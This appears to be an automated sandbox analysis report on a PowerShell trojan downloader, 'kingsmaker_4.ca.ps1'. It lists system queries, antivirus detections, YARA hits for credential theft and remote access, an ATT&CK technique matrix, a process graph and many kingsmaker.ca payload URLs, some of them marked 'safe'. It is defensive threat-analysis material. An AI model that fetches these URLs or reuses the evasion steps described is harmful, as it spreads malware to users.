        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
        Source: C:\Windows\Temp\svczHost.exeCode function: 20_2_00007FF71749BFE0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,20_2_00007FF71749BFE0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: powershell.exe, 00000000.00000002.2471764698.000001BDEAD28000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2396382298.000001BDD226B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3428402051.0000016AF7CE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: amsi64_7368.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7120, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7368, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: amsi64_7368.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7120, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7368, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts321
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        Disable or Modify Tools
        OS Credential Dumping1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        1
        Ingress Tool Transfer
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter
        1
        Windows Service
        1
        Windows Service
        1
        Deobfuscate/Decode Files or Information
        LSASS Memory2
        File and Directory Discovery
        Remote Desktop ProtocolData from Removable Media11
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Service Execution
        Logon Script (Windows)11
        Process Injection
        1
        Obfuscated Files or Information
        Security Account Manager124
        System Information Discovery
        SMB/Windows Admin SharesData from Network Shared Drive3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts4
        PowerShell
        Login HookLogin Hook1
        Software Packing
        NTDS441
        Security Software Discovery
        Distributed Component Object ModelInput Capture14
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets1
        Process Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        File Deletion
        Cached Domain Credentials251
        Virtualization/Sandbox Evasion
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
        Masquerading
        DCSync1
        Application Window Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
        Virtualization/Sandbox Evasion
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
        Process Injection
        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565059 Sample: kingsmaker_4.ca.ps1 Startdate: 29/11/2024 Architecture: WINDOWS Score: 100 77 x1.i.lencr.org 2->77 79 kingsmaker.ca 2->79 87 Malicious sample detected (through community Yara rule) 2->87 89 Antivirus / Scanner detection for submitted sample 2->89 91 Multi AV Scanner detection for submitted file 2->91 93 7 other signatures 2->93 10 powershell.exe 14 45 2->10         started        15 svczHost.exe 2->15         started        17 svchost.exe 2->17         started        signatures3 process4 dnsIp5 81 kingsmaker.ca 104.21.75.170, 443, 49704, 49705 CLOUDFLARENETUS United States 10->81 71 C:\Users\user\AppData\...\pkwqtvat.cmdline, Unicode 10->71 dropped 105 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 10->105 107 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 10->107 109 Found suspicious powershell code related to unpacking or dynamic code loading 10->109 117 3 other signatures 10->117 19 cmd.exe 1 10->19         started        22 powershell.exe 2 23 10->22         started        24 csc.exe 3 10->24         started        27 conhost.exe 10->27         started        111 Multi AV Scanner detection for dropped file 15->111 113 Suspicious powershell command line found 15->113 115 Encrypted powershell cmdline option found 15->115 29 powershell.exe 15->29         started        31 cmd.exe 15->31         started        33 powershell.exe 15->33         started        35 2 other processes 15->35 83 127.0.0.1 unknown unknown 17->83 file6 signatures7 process8 file9 95 Suspicious powershell command line found 19->95 97 Encrypted powershell cmdline option found 19->97 99 Bypasses PowerShell execution policy 19->99 37 powershell.exe 19->37         started        41 conhost.exe 19->41         started        43 Acrobat.exe 59 22->43         started        45 conhost.exe 22->45         started        69 C:\Users\user\AppData\Local\...\pkwqtvat.dll, PE32 24->69 dropped 47 cvtres.exe 1 24->47         started        101 Loading BitLocker PowerShell Module 29->101 49 conhost.exe 29->49         started        51 conhost.exe 31->51         started        53 sc.exe 31->53         started        55 conhost.exe 33->55         started        signatures10 process11 file12 67 C:\Windows\Temp\svczHost.exe, PE32+ 37->67 dropped 103 Potential dropper URLs found in powershell memory 37->103 57 conhost.exe 37->57         started        59 WmiPrvSE.exe 37->59         started        61 AcroCEF.exe 43->61         started        signatures13 process14 dnsIp15 85 192.168.2.5, 137, 443, 49703 unknown unknown 61->85 64 AcroCEF.exe 61->64         started        process16 dnsIp17 73 52.6.155.20, 443, 49765 AMAZON-AESUS United States 64->73 75 96.17.64.171, 443, 49770 AKAMAI-ASUS United States 64->75

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        kingsmaker_4.ca.ps116%ReversingLabsScript-PowerShell.Trojan.Boxter
        kingsmaker_4.ca.ps1100%AviraTR/PShell.Dldr.VPAL
        SourceDetectionScannerLabelLink
        C:\Windows\Temp\svczHost.exe67%ReversingLabsWin64.Trojan.Generic
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66a2bd10c53ccb7e2954104e6af3dc2acc0%Avira URL Cloudsafe
        https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66496034c845ffb30%Avira URL Cloudsafe
        https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66a2bd10c53ccb7e0%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/31b8a1b5c89fe194298b8a9855e2443860920f3b00d19a946f931f7c332bd239766e1de80%Avira URL Cloudsafe
        http://kingsmaker.ca0%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/2db1653a19d9e7820417a355a5bebd72b81f7e460fa70a5a1edfbf43f5b246051372de1d0%Avira URL Cloudsafe
        https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66496034c845ffb376a509fda7f7ab3d1d0%Avira URL Cloudsafe
        https://kingsmaker.ca/4cbd637a18X0%Avira URL Cloudsafe
        https://kingsmaker.ca/file3/f4c66a2f2c057f3b06250f3211c5a32657d9f73187a74ad9a0c73befa87bed5adaa1b59e0%Avira URL Cloudsafe
        https://kingsmaker.ca0%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d370%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/1cbf3117c11b4baa44d1af2ed672d3f7e682f880ba2af6da9ab49b05b6edeb6dea5522ed0%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/30bb492ec87899a2b4a8fa5c9eeec46957553fd4ccfb234669d52f6f2a278556703b98ac0%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/31b8a1b5c89fe194298b8a9855e2443860920f3b00d19a946f931f7c332bd239766e1de8c7b2f19233540c7f291919f9c9191eff7a5de7868f190137bd7c2f225e9653c0a8361473c2464503478c32210e436919ed4dab25f52021847773e83d150bf92182d21b4dc33f01eee91ea1fa0%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/30bb492ec87899a2b4a8fa5c9eeec46957553fd4ccfb234669d52f6f2a278556703b98ace61ec66f52d29b28a8a4a890956d54d1d9e24579c740190b8799b1b67a5f4a6dff13c00dd57d89558c4a1e3705f0cd3f182dd3fb5270007203188fb60%Avira URL Cloudsafe
        https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b667154084aaf3afc0%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/2db1X0%Avira URL Cloudsafe
        http://kingsmaker.ca:80/x0%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d37f90e005e11b96d6117629046990c1df79aa9735289308c1b2fa9edeea4dc5fe5a09bf9b2773eeaf90950b696fe10cc9db3745b5151e4b000a791213cf93f25070f589b40fd3e39c4a18edad20%Avira URL Cloudsafe
        https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad5X0%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/15d47d61496bbc5686d7406c0812dea52edfae361c42a72b85312aef81a346647d70b9be53bdebcdef5aacc13bbe01d56c85c91fad8c9b5e4884b741db2ee8f3a341e996a09fa3ade76a4e05f7f0974e4b6acbc75d0f6c645f96d06ea4d04590f12a7ca8a7453339c787d192c681aca60%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/1cbf3117c11b4baa44d1af2ed672d3f7e682f880ba2af6da9ab49b05b6edeb6dea5522edb4c2cc6c8aa8275b28d356e62b21287f073b49fa8071c3b9b230e0be0956bdede2a75925f23344959b9fe0fd9f829d94ffeee7dfe68b77418c356c1d95c4ddba34383a8308b2f4fdd59f73670%Avira URL Cloudsafe
        https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b667154084aaf3afc1b0f9d6a14a3503e3e0%Avira URL Cloudsafe
        https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6635a8c2001ae9b40%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/2db10%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/15d47d61496bbc5686d7406c0812dea52edfae361c42a72b85312aef81a346647d70b9be0%Avira URL Cloudsafe
        https://kingsmaker.ca/file3/f4c66a2f2c057f3b06250f3211c5a32657d9f73187a74ad9a0c73befa87bed5adaa1b59ea3fe07e54381481ca0bece87f5a691b18216ec8f663043055b37a6c8d7a59731af4b6e1340bfd787088106580f90f257aa865ae7b57e00e4873a697e/Windows%20Defender/4/4/user/2030%Avira URL Cloudsafe
        https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6635a8c2001ae9b439940f2a4e27446bc20%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/31b80%Avira URL Cloudsafe
        http://kingsmaker.ca/api/check0%Avira URL Cloudsafe
        http://www.microsoft.cod0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        kingsmaker.ca
        104.21.75.170
        truefalse
          high
          x1.i.lencr.org
          unknown
          unknownfalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66a2bd10c53ccb7e2954104e6af3dc2accfalse
            • Avira URL Cloud: safe
            unknown
            https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66496034c845ffb376a509fda7f7ab3d1dfalse
            • Avira URL Cloud: safe
            unknown
